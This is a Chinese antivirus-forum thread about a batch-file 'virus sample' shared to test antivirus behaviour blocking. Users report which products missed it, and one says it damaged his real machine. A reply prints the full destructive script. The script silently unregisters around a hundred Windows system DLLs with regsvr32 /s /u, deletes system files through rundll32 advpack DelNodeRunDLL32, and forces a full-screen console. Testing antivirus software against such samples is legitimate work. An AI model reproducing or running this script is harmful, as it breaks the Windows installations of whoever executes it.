楼主: XMonster
收起左侧

[病毒样本] 转自:爱毒霸---批处理,测主防

  [复制链接]
消停
头像被屏蔽
发表于 2012-6-11 16:10:45 | 显示全部楼层
双击过诺顿SONAR
liulangzhecgr
发表于 2012-6-13 09:13:32 | 显示全部楼层
bat文件打开看之后,再决定不迟呗 !
1159614431
头像被屏蔽
发表于 2012-6-26 21:00:13 | 显示全部楼层
毛豆没反应
cjz
发表于 2012-6-27 10:45:39 | 显示全部楼层
哀酱俏佳人 发表于 2012-6-9 18:07
测主防的,双击吧

双击了,没防住,而且是实机,完了这回死了,毒霸全盘扫,没发现,求解啊版主
哀酱俏佳人
发表于 2012-6-27 11:26:11 | 显示全部楼层
cjz 发表于 2012-6-27 10:45
双击了,没防住,而且是实机,完了这回死了,毒霸全盘扫,没发现,求解啊版主

。。。。这里的文件都不要用实机双击,实机可以扫描




用一下NPE吧



尘梦幽然
发表于 2012-6-27 11:29:04 | 显示全部楼层
消停 发表于 2012-6-11 16:10
双击过诺顿SONAR

反注册系统目录的dll文件本身并非恶意行为。只不过数量众多而已。本身不属于恶意。
尘梦幽然
发表于 2012-6-27 11:30:09 | 显示全部楼层
哀酱俏佳人 发表于 2012-6-27 11:26
。。。。这里的文件都不要用实机双击,实机可以扫描

反注册系统目录的dll文件本身并非恶意行为。只不过数量众多而已。本身不属于恶意。
而且它似乎没有附带病毒文件,所以NPE无力。NPE对批处理是不分级的。
哀酱俏佳人
发表于 2012-6-27 11:34:14 | 显示全部楼层
尘梦幽然 发表于 2012-6-27 11:30
反注册系统目录的dll文件本身并非恶意行为。只不过数量众多而已。本身不属于恶意。
而且它似乎没有附带病 ...

噢噢,明白,我也不清楚是怎么回事了,刚上线就看到消息。。。。

评分

参与人数 1人气 +1 收起 理由
尘梦幽然 + 1 乃的回复让人有一种前后矛盾的纠结感

查看全部评分

cjz
发表于 2012-6-27 12:03:41 | 显示全部楼层
哀酱俏佳人 发表于 2012-6-27 11:26
。。。。这里的文件都不要用实机双击,实机可以扫描

呵呵不懂
sungan01
发表于 2012-6-27 20:52:19 | 显示全部楼层
本帖最后由 sungan01 于 2012-6-27 20:57 编辑

干脆全删了得了,干嘛解除注册。。。再注册一下不就完了。。


rem By Milo
@echo off  

rem 全屏代码。。

echo exit|%ComSpec% /k prompt e 100 B4 00 B0 12 CD 10 B0 03 CD 10 CD 20 $_g$_q$_|debug>nul  
chcp 437>nul  
graftabl 936>nul  
color 0a  



rem 反向注册系统dll

regsvr32 /s /u *.dll

rundll32.exe advpack.dll /DelNodeRunDLL32 %systemroot%\System32\dacui.dll
rundll32.exe advpack.dll /DelNodeRunDLL32 %systemroot%\Catroot\icatalog.mdb
regsvr32 /s /u setupwbv.dll
regsvr32 /s /u wininet.dll
regsvr32 /s /u comcat.dll
regsvr32 /s /u shdoc401.dll
regsvr32 /s /u shdoc401.dll /i
regsvr32 /s /u asctrls.ocx
regsvr32 /s /u oleaut32.dll
regsvr32 /s /u shdocvw.dll /I
regsvr32 /s /u shdocvw.dll
regsvr32 /s /u browseui.dll
regsvr32 /s /u browseui.dll /I
regsvr32 /s /u msrating.dll
regsvr32 /s /u mlang.dll
regsvr32 /s /u hlink.dll
regsvr32 /s /u mshtml.dll
regsvr32 /s /u mshtmled.dll
regsvr32 /s /u urlmon.dll
regsvr32 /s /u plugin.ocx
regsvr32 /s /u sendmail.dll
regsvr32 /s /u comctl32.dll /i
regsvr32 /s /u inetcpl.cpl /i
regsvr32 /s /u mshtml.dll /i
regsvr32 /s /u scrobj.dll
regsvr32 /s /u mmefxe.ocx
regsvr32 /s /u proctexe.ocx mshta.exe /register
regsvr32 /s /u corpol.dll
regsvr32 /s /u jscript.dll
regsvr32 /s /u msxml.dll
regsvr32 /s /u imgutil.dll
regsvr32 /s /u thumbvw.dll
regsvr32 /s /u cryptext.dll
regsvr32 /s /u rsabase.dll
regsvr32 /s /u triedit.dll
regsvr32 /s /u dhtmled.ocx
regsvr32 /s /u inseng.dll
regsvr32 /s /u iesetup.dll /i
regsvr32 /s /u hmmapi.dll
regsvr32 /s /u cryptdlg.dll
regsvr32 /s /u actxprxy.dll
regsvr32 /s /u dispex.dll
regsvr32 /s /u occache.dll
regsvr32 /s /u occache.dll /i
regsvr32 /s /u iepeers.dll
regsvr32 /s /u wininet.dll /i
regsvr32 /s /u urlmon.dll /i
regsvr32 /s /u digest.dll /i
regsvr32 /s /u cdfview.dll
regsvr32 /s /u webcheck.dll
regsvr32 /s /u mobsync.dll
regsvr32 /s /u pngfilt.dll
regsvr32 /s /u licmgr10.dll
regsvr32 /s /u icmfilter.dll
regsvr32 /s /u hhctrl.ocx
regsvr32 /s /u inetcfg.dll
regsvr32 /s /u trialoc.dll
regsvr32 /s /u tdc.ocx
regsvr32 /s /u MSR2C.DLL
regsvr32 /s /u msident.dll
regsvr32 /s /u msieftp.dll
regsvr32 /s /u xmsconf.ocx
regsvr32 /s /u ils.dll
regsvr32 /s /u msoeacct.dll
regsvr32 /s /u wab32.dll
regsvr32 /s /u wabimp.dll
regsvr32 /s /u wabfind.dll
regsvr32 /s /u oemiglib.dll
regsvr32 /s /u directdb.dll
regsvr32 /s /u inetcomm.dll
regsvr32 /s /u msoe.dll
regsvr32 /s /u oeimport.dll
regsvr32 /s /u msdxm.ocx
regsvr32 /s /u dxmasf.dll
regsvr32 /s /u laprxy.dll
regsvr32 /s /u l3codecx.ax
regsvr32 /s /u acelpdec.ax
regsvr32 /s /u mpg4ds32.ax
regsvr32 /s /u voxmsdec.ax
regsvr32 /s /u danim.dll
regsvr32 /s /u Daxctle.ocx
regsvr32 /s /u lmrt.dll
regsvr32 /s /u datime.dll
regsvr32 /s /u dxtrans.dll
regsvr32 /s /u dxtmsft.dll
regsvr32 /s /u vgx.dll
regsvr32 /s /u WEBPOST.DLL
regsvr32 /s /u WPWIZDLL.DLL
regsvr32 /s /u POSTWPP.DLL
regsvr32 /s /u CRSWPP.DLL
regsvr32 /s /u FTPWPP.DLL
regsvr32 /s /u FPWPP.DLL
regsvr32 /s /u FLUPL.OCX
regsvr32 /s /u wshom.ocx
regsvr32 /s /u wshext.dll
regsvr32 /s /u vbscript.dll
regsvr32 /s /u wupdinfo.dll
regsvr32 /s /u shimgvw.dll
regsvr32 /s /u wmpdxm.dll
regsvr32 /s /u appwiz.cpl
regsvr32 /s /u msi.dll
regsvr32 /s /u /i shell32.dll
regsvr32 /s /u scrrun.dll mstinit.exe /setup
regsvr32 /s /u msnsspc.dll /SspcCreateSspiReg
regsvr32 /s /u msapsspc.dll /SspcCreateSspiReg
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-12-30 17:59 , Processed in 0.090532 second(s), 4 queries , Redis On.

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表